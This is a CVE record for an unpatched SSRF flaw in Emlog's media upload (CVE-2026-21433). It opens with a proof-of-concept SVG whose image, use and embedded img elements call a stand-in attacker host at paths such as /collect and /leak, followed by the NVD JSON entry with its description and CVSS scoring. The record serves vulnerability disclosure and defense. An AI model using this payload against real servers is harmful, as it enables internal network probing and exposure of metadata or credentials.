CVE-2026-21433

<!-- CVE-2026-21433 PoC: Malicious SVG for SSRF --> <!-- Upload this SVG file via /admin/media.php --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" width="500" height="500"> <!-- External resource reference for SSRF --> <image href="http://attacker-controlled-server.com/collect" width="100" height="100"/> <!-- Alternative: Use use element with external reference --> <use href="http://attacker-controlled-server.com/internal-probe"/> <!-- Trigger request during SVG parsing --> <foreignObject width="1" height="1"> <img xmlns="http://www.w3.org/1999/xhtml" src="http://attacker-controlled-server.com/leak"/> </foreignObject> </svg> <!-- Server-side request will be made to attacker server when SVG is processed -->

{"cve": {"id": "CVE-2026-21433", "sourceIdentifier": "[email protected]", "published": "2026-01-02T19:15:48.187", "lastModified": "2026-01-16T18:11:24.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emlog is an open source website building system. Versions up to and including 2.5.19 are vulnerable to server-side Out-of-Band (OOB) requests / SSRF via uploaded SVG files. An attacker can upload a crafted SVG to http[:]//emblog/admin/media[.]php which contains external resource references. When the server processes/renders the SVG (thumbnailing, preview, or sanitization), it issues an HTTP request to the attacker-controlled host. Impact: server-side SSRF/OOB leading to internal network probing and potential metadata/credential exposure. As of time of publication, no known patched versions are available."}, {"lang": "es", "value": "Emlog es un sistema de construcción de sitios web de código abierto. Las versiones hasta la 2.5.19 inclusive son vulnerables a solicitudes fuera de banda (OOB) del lado del servidor / SSRF a través de archivos SVG subidos. Un atacante puede subir un SVG manipulado a http[:]//emblog/admin/media[.]php que contiene referencias a recursos externos. Cuando el servidor procesa/renderiza el SVG (generación de miniaturas, vista previa o sanitización), emite una solicitud HTTP al host controlado por el atacante. Impacto: SSRF/OOB del lado del servidor que conduce a sondeo de red interna y posible exposición de metadatos/credenciales. En el momento de la publicación, no hay versiones parcheadas conocidas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:*", "versionEndIncluding": "2.5.19", "matchCriteriaId": "72E4E5DE-A4A2-4326-B8EE-71690D75F7AE"}]}]}], "references": [{"url": "https://github.com/emlog/emlog/security/advisories/GHSA-6rwr-c8hc-mjj4", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}